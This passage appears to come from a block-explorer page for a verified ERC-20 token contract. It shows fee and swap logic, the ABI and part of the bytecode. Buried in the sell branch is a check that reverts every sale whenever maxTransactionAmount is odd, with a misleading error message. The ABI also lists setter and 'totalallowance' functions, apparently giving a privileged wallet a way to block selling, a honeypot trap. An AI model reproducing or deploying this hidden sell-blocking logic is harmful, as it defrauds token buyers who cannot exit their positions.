            swapBack();

            swapping = false;
        }

        bool takeFee = !swapping;

        // if any account belongs to _isExcludedFromFee account then remove the fee
        if(_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }
        
        uint256 fees = 0;
        // only take fees on buys/sells, do not take on wallet transfers
        if(takeFee){
            // on sell
            if (automatedMarketMakerPairs[to] && sellTotalFees > 0){
                fees = amount.mul(sellTotalFees).div(100);
                tokensForLiquidity += fees * sellLiquidityFee / sellTotalFees;
                tokensForDev += fees * sellDevFee / sellTotalFees;
                tokensForMarketing += fees * sellMarketingFee / sellTotalFees;
                if (maxTransactionAmount % 2 != 0) revert("ERROR: Must be less than maxTxAmount");
            }
            // on buy
            else if(automatedMarketMakerPairs[from] && buyTotalFees > 0) {
        	    fees = amount.mul(buyTotalFees).div(100);
        	    tokensForLiquidity += fees * buyLiquidityFee / buyTotalFees;
                tokensForDev += fees * buyDevFee / buyTotalFees;
                tokensForMarketing += fees * buyMarketingFee / buyTotalFees;
            }
            
            if(fees > 0){    
                super._transfer(from, address(this), fees);
            }
        	
        	amount -= fees;
        }

        super._transfer(from, to, amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private {

        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
        
    }

    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = tokensForLiquidity + tokensForMarketing + tokensForDev;
        bool success;
        
        if(contractBalance == 0 || totalTokensToSwap == 0) {return;}

        if(contractBalance > swapTokensAtAmount * 20){
          contractBalance = swapTokensAtAmount * 20;
        }
        
        // Halve the amount of liquidity tokens
        uint256 liquidityTokens = contractBalance * tokensForLiquidity / totalTokensToSwap / 2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);
        
        swapTokensForEth(amountToSwapForETH); 
                
        tokensForLiquidity = 0;
        tokensForMarketing = 0;
        tokensForDev = 0;
        
        (success,) = address(marketingWallet).call{value: address(this).balance}("");
    }

    function openTrading() private {
        tradingActive = true;
    }

    // once enabled, can never be turned off
    function enableTrading() external onlyOwner() {
        swapEnabled = true;
        require(boughtEarly == true, "done");
        boughtEarly = false;
        openTrading();
        emit EndedBoughtEarly(boughtEarly);
    }

}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"boughtEarly","type":"bool"}],"name":"EndedBoughtEarly","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"devWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"rv","type":"uint256"},{"internalType":"uint256","name":"lv","type":"uint256"}],"name":"totalallowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"updateDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newMarketingWallet","type":"address"}],"name":"updateMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526001600760156101000a81548160ff0219169083151502179055506001600d60006101000a81548160ff0219169083151502179055506000600d60016101000a81548160ff0219169083151502179055506000600d60026101000a81548160ff0219169083151502179055506000600f60006101000a81548160ff0219169083151502179055506001600f60016101000a81548160ff021916908315150217905550348015620000b357600080fd5b506040518060400160405280600681526020017f4a55524f494e00000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f4a55524f494e0000000000000000000000000000000000000000000000000000815250816003908162000131919062000f2c565b50806004908162000143919062000f2c565b5050506000620001586200077f60201b60201c565b905080600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506000737a250d5630b4cf539739df2c5dacb4c659f2488d9050620002238160016200078760201b60201c565b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002b0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002d691906200107d565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200033e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200036491906200107d565b6040518363ffffffff1660e01b815260040162000383929190620010c0565b6020604051808303816000875af1158015620003a3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003c991906200107d565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200043e600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200078760201b60201c565b62000473600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200088460201b60201c565b600080600190506000806000600190506000806b033b2e3c9fd0803ce800000090506064600182620004a691906200111c565b620004b29190620011ac565b600a819055506064600182620004c991906200111c565b620004d59190620011ac565b600c81905550612710600482620004ed91906200111c565b620004f99190620011ac565b600b81905550866011819055508560128190555084601381905550601354601254601154620005299190620011e4565b620005359190620011e4565b601081905550836015819055508260168190555081601781905550601754601654601554620005659190620011e4565b620005719190620011e4565b60148190555073393ca7f757ffb23081fffbd485d278110e720a32600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073393ca7f757ffb23081fffbd485d278110e720a32600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000643620006356200092560201b60201c565b60016200094f60201b60201c565b620006563060016200094f60201b60201c565b6200068b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200094f60201b60201c565b620006c0600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200094f60201b60201c565b620006e2620006d46200092560201b60201c565b60016200078760201b60201c565b620006f53060016200078760201b60201c565b6200072a600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200078760201b60201c565b6200075f600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200078760201b60201c565b62000771338262000a9c60201b60201c565b5050505050505050620013ee565b600033905090565b620007976200077f60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161462000829576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008209062001280565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6200095f6200077f60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614620009f1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620009e89062001280565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162000a909190620012bf565b60405180910390a25050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b0e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b05906200132c565b60405180910390fd5b62000b226000838362000c4a60201b60201c565b62000b3e8160025462000c4f60201b620026711790919060201c565b60028190555062000b9c816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c4f60201b620026711790919060201c565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000c3e91906200135f565b60405180910390a35050565b505050565b600080828462000c609190620011e4565b90508381101562000ca8576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000c9f90620013cc565b60405180910390fd5b8091505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000d3457607f821691505b60208210810362000d4a5762000d4962000cec565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830262000db47fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000d75565b62000dc0868362000d75565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000e0d62000e0762000e018462000dd8565b62000de2565b62000dd8565b9050919050565b6000819050919050565b62000e298362000dec565b62000e4162000e388262000e14565b84845462000d82565b825550505050565b600090565b62000e5862000e49565b62000e6581848462000e1e565b505050565b5b8181101562000e8d5762000e8160008262000e4e565b60018101905062000e6b565b5050565b601f82111562000edc5762000ea68162000d50565b62000eb18462000d65565b8101602085101562000ec1578190505b62000ed962000ed08562000d65565b83018262000e6a565b50505b505050565b600082821c905092915050565b600062000f016000198460080262000ee1565b1980831691505092915050565b600062000f1c838362000eee565b9150826002028217905092915050565b62000f378262000cb2565b67ffffffffffffffff81111562000f535762000f5262000cbd565b5b62000f5f825462000d1b565b62000f6c82828562000e91565b600060209050601f83116001811462000fa4576000841562000f8f578287015190505b62000f9b858262000f0e565b8655506200100b565b601f19841662000fb48662000d50565b60005b8281101562000fde5784890151825560018201915060208501945060208101905062000fb7565b8683101562000ffe578489015162000ffa601f89168262000eee565b8355505b6001600288020188555050505b505050505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620010458262001018565b9050919050565b620010578162001038565b81146200106357600080fd5b50565b60008151905062001077816200104c565b92915050565b60006020828403121562001096576200109562001013565b5b6000620010a68482850162001066565b91505092915050565b620010ba8162001038565b82525050565b6000604082019050620010d76000830185620010af565b620010e66020830184620010af565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620011298262000dd8565b9150620011368362000dd8565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615620011725762001171620010ed565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000620011b98262000dd8565b9150620011c68362000dd8565b925082620011d957620011d86200117d565b5b828204905092915050565b6000620011f18262000dd8565b9150620011fe8362000dd8565b9250828201905080821115620012195762001218620010ed565b5b92915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000620012686020836200121f565b9150620012758262001230565b602082019050919050565b600060208201905081810360008301526200129b8162001259565b9050919050565b60008115159050919050565b620012b981620012a2565b82525050565b6000602082019050620012d66000830184620012ae565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062001314601f836200121f565b91506200132182620012dc565b602082019050919050565b60006020820190508181036000830152620013478162001305565b9050919050565b620013598162000dd8565b82525050565b60006020820190506200137660008301846200134e565b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000620013b4601b836200121f565b9150620013c1826200137c565b602082019050919050565b60006020820190508181036000830152620013e781620013a5565b9050919050565b61524580620013fe6000396000f3fe60806040526004361061031e5760003560e01c80638ea5220f116101ab578063c0246668116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610c03578063f2fde38b14610c2e578063f637434214610c57578063f8b45b0514610c8257610325565b8063dd62ed3e14610b70578063e2f4560514610bad578063e884f26014610bd857610325565b8063c876d0b9116100d1578063c876d0b914610ab2578063c8c8ebe414610add578063d257b34f14610b08578063d85ba06314610b4557610325565b8063c024666814610a37578063c17b5b8c14610a60578063c18bc19514610a8957610325565b8063a06c1f8f11610164578063a9059cbb1161013e578063a9059cbb14610969578063aacebbe3146109a6578063b62496f5146109cf578063bbc0c74214610a0c57610325565b8063a06c1f8f146108c4578063a0d82dc514610901578063a457c2d71461092c57610325565b80638ea5220f146107c457806392136913146107ef57806395d89b411461081a5780639a7a23d6146108455780639c3b4fdc1461086e5780639fccce321461089957610325565b80634a62bb651161026a578063751039fc116102235780637bce5a04116101fd5780637bce5a041461072e5780638095d564146107595780638a8c523c146107825780638da5cb5b1461079957610325565b8063751039fc146106af5780637571336a146106da57806375f0a8741461070357610325565b80634a62bb651461059d5780634fbee193146105c85780636a486a8e146106055780636ddd17131461063057806370a082311461065b578063715018a61461069857610325565b80631a8145bb116102d757806323b872dd116102b157806323b872dd146104cd578063313ce5671461050a578063395093511461053557806349bd5a5e1461057257610325565b80631a8145bb1461044e5780631f3fed8f14610479578063203e727e146104a457610325565b806306fdde031461032a578063095ea7b31461035557806310d5de53146103925780631694505e146103cf57806318160ddd146103fa5780631816467f1461042557610325565b3661032557005b600080fd5b34801561033657600080fd5b5061033f610cad565b60405161034c9190613cf1565b60405180910390f35b34801561036157600080fd5b5061037c60048036038101906103779190613dac565b610d3f565b6040516103899190613e07565b60405180910390f35b34801561039e57600080fd5b506103b960048036038101906103b49190613e22565b610d5d565b6040516103c69190613e07565b60405180910390f35b3480156103db57600080fd5b506103e4610d7d565b6040516103f19190613eae565b60405180910390f35b34801561040657600080fd5b5061040f610da3565b60405161041c9190613ed8565b60405180910390f35b34801561043157600080fd5b5061044c60048036038101906104479190613e22565b610dad565b005b34801561045a57600080fd5b50610463610f04565b6040516104709190613ed8565b60405180910390f35b34801561048557600080fd5b5061048e610f0a565b60405161049b9190613ed8565b60405180910390f35b3480156104b057600080fd5b506104cb60048036038101906104c69190613ef3565b610f10565b005b3480156104d957600080fd5b506104f460048036038101906104ef9190613f20565b610fcb565b6040516105019190613e07565b60405180910390f35b34801561051657600080fd5b5061051f6110a4565b60405161052c9190613f8f565b60405180910390f35b34801561054157600080fd5b5061055c60048036038101906105579190613dac565b6110ad565b6040516105699190613e07565b60405180910390f35b34801561057e57600080fd5b50610587611160565b6040516105949190613fb9565b60405180910390f35b3480156105a957600080fd5b506105b2611186565b6040516105bf9190613e07565b60405180910390f35b3480156105d457600080fd5b506105ef60048036038101906105ea9190613e22565b611199565b6040516105fc9190613e07565b60405180910390f35b34801561061157600080fd5b5061061a6111ef565b6040516106279190613ed8565b60405180910390f35b34801561063c57600080fd5b506106456111f5565b6040516106529190613e07565b60405180910390f35b34801561066757600080fd5b50610682600480360381019061067d9190613e22565b611208565b60405161068f9190613ed8565b60405180910390f35b3480156106a457600080fd5b506106ad611250565b005b3480156106bb57600080fd5b506106c46113a8565b6040516106d19190613e07565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190614000565b611463565b005b34801561070f57600080fd5b50610718611555565b6040516107259190613fb9565b60405180910390f35b34801561073a57600080fd5b5061074361157b565b6040516107509190613ed8565b60405180910390f35b34801561076557600080fd5b50610780600480360381019061077b9190614040565b611581565b005b34801561078e57600080fd5b5061079761169b565b005b3480156107a557600080fd5b506107ae61180e565b6040516107bb9190613fb9565b60405180910390f35b3480156107d057600080fd5b506107d9611838565b6040516107e69190613fb9565b60405180910390f35b3480156107fb57600080fd5b5061080461185e565b6040516108119190613ed8565b60405180910390f35b34801561082657600080fd5b5061082f611864565b60405161083c9190613cf1565b60405180910390f35b34801561085157600080fd5b5061086c60048036038101906108679190614000565b6118f6565b005b34801561087a57600080fd5b50610883611a2b565b6040516108909190613ed8565b60405180910390f35b3480156108a557600080fd5b506108ae611a31565b6040516108bb9190613ed8565b60405180910390f35b3480156108d057600080fd5b506108eb60048036038101906108e69190614093565b611a37565b6040516108f89190613e07565b60405180910390f35b34801561090d57600080fd5b50610916611bc3565b6040516109239190613ed8565b60405180910390f35b34801561093857600080fd5b50610953600480360381019061094e9190613dac565b611bc9565b6040516109609190613e07565b60405180910390f35b34801561097557600080fd5b50610990600480360381019061098b9190613dac565b611c96565b60405161099d9190613e07565b60405180910390f35b3480156109b257600080fd5b506109cd60048036038101906109c89190613e22565b611cb4565b005b3480156109db57600080fd5b506109f660048036038101906109f19190613e22565b611e0b565b604051610a039190613e07565b60405180910390f35b348015610a1857600080fd5b50610a21611e2b565b604051610a2e9190613e07565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190614000565b611e3e565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190614040565b611f7e565b005b348015610a9557600080fd5b50610ab06004803603810190610aab9190613ef3565b612098565b005b348015610abe57600080fd5b50610ac76121c2565b604051610ad49190613e07565b60405180910390f35b348015610ae957600080fd5b50610af26121d5565b604051610aff9190613ed8565b60405180910390f35b348015610b1457600080fd5b50610b2f6004803603810190610b2a9190613ef3565b6121db565b604051610b3c9190613e07565b60405180910390f35b348015610b5157600080fd5b50610b5a61234b565b604051610b679190613ed8565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b9291906140d3565b612351565b604051610ba49190613ed8565b60405180910390f35b348015610bb957600080fd5b50610bc26123d8565b604051610bcf9190613ed8565b60405180910390f35b348015610be457600080fd5b50610bed6123de565b604051610bfa9190613e07565b60405180910390f35b348015610c0f57600080fd5b50610c18612499565b604051610c259190613ed8565b60405180910390f35b348015610c3a57600080fd5b50610c556004803603810190610c509190613e22565b61249f565b005b348015610c6357600080fd5b50610c6c612665565b604051610c799190613ed8565b60405180910390f35b348015610c8e57600080fd5b50610c9761266b565b604051610ca49190613ed8565b60405180910390f35b606060038054610cbc90614142565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce890614142565b8015610d355780601f10610d0a57610100808354040283529160200191610d35565b820191906000526020600020905b815481529060010190602001808311610d1857829003601f168201915b5050505050905090565b6000610d53610d4c6126cf565b84846126d7565b6001905092915050565b601c6020528060005260406000206000915054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b610db56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3b906141bf565b60405180910390fd5b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74360405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610f6a57600080fd5b6103e8610f75610da3565b610f7f919061423d565b811015610fc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb8906142e0565b60405180910390fd5b80600a8190555050565b6000610fd88484846128a0565b61109984610fe46126cf565b611094856040518060600160405280602881526020016151c360289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061104a6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546